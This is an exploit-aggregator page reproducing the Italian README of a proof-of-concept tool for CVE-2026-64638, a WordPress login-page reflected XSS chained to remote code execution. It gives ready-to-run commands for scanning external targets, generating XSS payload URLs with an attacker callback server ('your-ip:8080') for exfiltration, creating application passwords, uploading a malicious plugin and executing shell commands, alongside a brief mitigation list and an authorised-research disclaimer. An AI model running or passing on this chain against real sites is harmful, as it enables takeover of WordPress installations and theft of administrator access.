Sploitus

Exploit for CVE-2026-64638-POC

kitploit Β· 2026-08-28

Exploit Code

MARKDOWN187 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-IMBAS007-CVE-2026-64638-POC
# CVE-2026-64638 β€” XSS2Shell

> **XSS riflesso pre-autenticazione β†’ Esecuzione remota di codice nel core di WordPress**

![License](https://img.shields.io/badge/license-MIT-blue.svg) ![WordPress](https://img.shields.io/badge/WordPress-7.0.2--vulnerable-red) ![CVE](https://img.shields.io/badge/CVE-2026--64638-critical-red)

> ⚠️ **DISCLAIMER:** Questo repository è destinato **esclusivamente a ricerca di sicurezza autorizzata e scopi didattici**. Non utilizzarlo contro sistemi di cui non si è proprietari o per i quali non si dispone di esplicita autorizzazione scritta. L'accesso non autorizzato è illegale. Vedi SECURITY.md.

* * *

## Panoramica

CVE-2026-64638 Γ¨ una **XSS riflessa pre-autenticazione** nel pipeline di elaborazione di login/wplogin del core di WordPress. Il difetto deriva da un differenziale tra parser: l'input malformato sopravvive a `strip_tags()` di PHP ma viene successivamente ricostruito come HTML da `wp_kses_post()`, consentendo al markup controllato dall'attaccante di raggiungere il DOM.

I ricercatori di pwn.ai hanno dimostrato **XSS2Shell** β€” una catena che porta questa XSS alla piena esecuzione di codice PHP su un'installazione WordPress predefinita quando un amministratore autenticato interagisce con contenuti controllati dall'attaccante.

ProprietΓ | Valore  
---|---  
**CVE**|  CVE-2026-64638  
**CVSS**|  8.9  
**Tipo**|  Catena XSS riflessa β†’ RCE  
**Componente**|  Pagina di login del core di WordPress  
**Versioni interessate**|  WordPress < 7.0.3 (backport fino alla 4.7)  
**Corretta in**|  WordPress 7.0.3 (6 agosto 2026)  
**Causa principale**|  Differenziale di parser: `strip_tags()` vs `wp_kses_post()`  
  
* * *

## Avvio rapido (Docker)

root@kitploit:~
    
    
    git clone https://github.com/<your>/CVE-2026-64638-POC.git
    cd CVE-2026-64638-POC
    
    # One command β€” spin up vulnerable WordPress 7.0.2 + run full chain
    ./test.sh up
    ./test.sh chain
    

**Cosa succede:**

root@kitploit:~
    
    
    [STAGE 1] WordPress 7.0.2 β†’ VULNERABLE
    [STAGE 2] XSS payload URL generated
    [STAGE 3] Application Password created
    [STAGE 4] Plugin uploaded + activated
    [STAGE 5] RCE β†’ uid=33(www-data)
    

### Tutti i comandi

root@kitploit:~
    
    
    ./test.sh up         # Start Docker + install WordPress (admin/admin123)
    ./test.sh scan       # Detect version & patch status
    ./test.sh chain      # Run full XSS2Shell RCE chain
    ./test.sh all        # up + scan + chain (all-in-one)
    ./test.sh down       # Stop containers
    ./test.sh clean      # Stop + remove all volumes
    
    # Or with Make
    make up              # Start Docker
    make install         # Install WordPress
    make scan            # Check vulnerability
    make gen-xss         # Generate XSS payload URL
    make test-chain      # Full RCE chain
    make serve           # Start callback server on :8080
    make down            # Stop containers
    

* * *

## Struttura del repository

root@kitploit:~
    
    
    CVE-2026-64638-POC/
    β”œβ”€β”€ README.md
    β”œβ”€β”€ SECURITY.md              # Security policy & disclaimer
    β”œβ”€β”€ docker-compose.yml        # WordPress 7.0.2 + MySQL 8 + WP-CLI
    β”œβ”€β”€ Makefile                  # Shortcut commands
    β”œβ”€β”€ test.sh                   # Automated test suite
    β”œβ”€β”€ requirements.txt          # Python dependencies
    β”‚
    β”œβ”€β”€ xss2shell_chain.py       # [MAIN] Full chain: scan β†’ XSS β†’ app-password β†’ plugin β†’ RCE
    β”œβ”€β”€ xss2shell_scanner.py     # Version detection + username reflection test
    β”œβ”€β”€ xss2shell_checker.py     # Lightweight patch checker (safe, non-exploitative)
    β”œβ”€β”€ exploit_server.py        # Callback server for XSS exfiltration
    β”œβ”€β”€ xss_payload.html         # Interactive XSS PoC (browser)
    β”‚
    └── docs/
        β”œβ”€β”€ CHAIN.md             # Technical breakdown of all 7 chain stages
        β”œβ”€β”€ MITIGATION.md        # Defensive guidance + detection rules
        └── PAYLOAD_NOTES.md     # Notes on the CVE-specific bypass payload
    

* * *

## Utilizzo manuale (target esterno)

root@kitploit:~
    
    
    python3 -m venv .venv && source .venv/bin/activate
    pip install -r requirements.txt
    
    # Scan target
    python3 xss2shell_chain.py scan -u https://target.example.com
    
    # Generate XSS payload
    python3 xss2shell_chain.py gen-xss -u https://target.example.com -c http://your-ip:8080
    
    # Full chain (requires WordPress admin credentials)
    python3 xss2shell_chain.py chain \
        -u https://target.example.com \
        --user admin --pass "password" \
        --cmd "id"
    
    # Individual stages
    python3 xss2shell_chain.py stage-apppass -u URL --user U --pass P
    python3 xss2shell_chain.py stage-plugin -u URL --apppass "PASS"
    python3 xss2shell_chain.py stage-rce -u URL --cmd "whoami"
    

* * *

## La catena di attacco XSS2Shell

Vedi `docs/CHAIN.md` per tutti i dettagli.

root@kitploit:~
    
    
    β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”
    β”‚  1. Reflected XSS on wp-login.php (failed-login error page)    β”‚
    β”‚  2. DOM clobbering to manipulate page context                   β”‚
    β”‚  3. JSONP / Same-Origin Method Execution (SOME)                 β”‚
    β”‚  4. Application Password creation via REST API                  β”‚
    β”‚  5. REST API access with stolen Application Password            β”‚
    β”‚  6. Malicious plugin/theme upload                               β”‚
    β”‚  7. PHP code execution β†’ full RCE                               β”‚
    β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜
    

> **Nota:** Le fasi 3-7 richiedono un amministratore con sessione attiva che interagisca con il payload XSS. La vulnerabilitΓ  Γ¨ pre-autenticazione, ma la catena RCE completa richiede accesso a livello di amministratore per essere completata.

* * *

## Mitigazione

  1. **Aggiornare immediatamente WordPress alla 7.0.3 o successiva**
  2. Abilitare gli aggiornamenti automatici in background
  3. Controllare le password applicazione (Utenti β†’ Profilo)
  4. Esaminare i log per username di login falliti sospetti
  5. Monitorare l'attivitΓ  di caricamento di plugin e temi



Vedi `docs/MITIGATION.md` per regole dettagliate di hardening e rilevamento.

* * *

## Riferimenti

  * WordPress 7.0.3 Security Release
  * pwn.ai XSS2Shell Blog
  * pwn.ai SOME/CSP Bypass Writeup
  * The Hacker News Coverage
  * The CyberSec Guru Article
  * CVE Record



## Autore

Ricerca sulla sicurezza e PoC. Solo per uso didattico.

## Licenza

MIT β€” Vedi LICENSE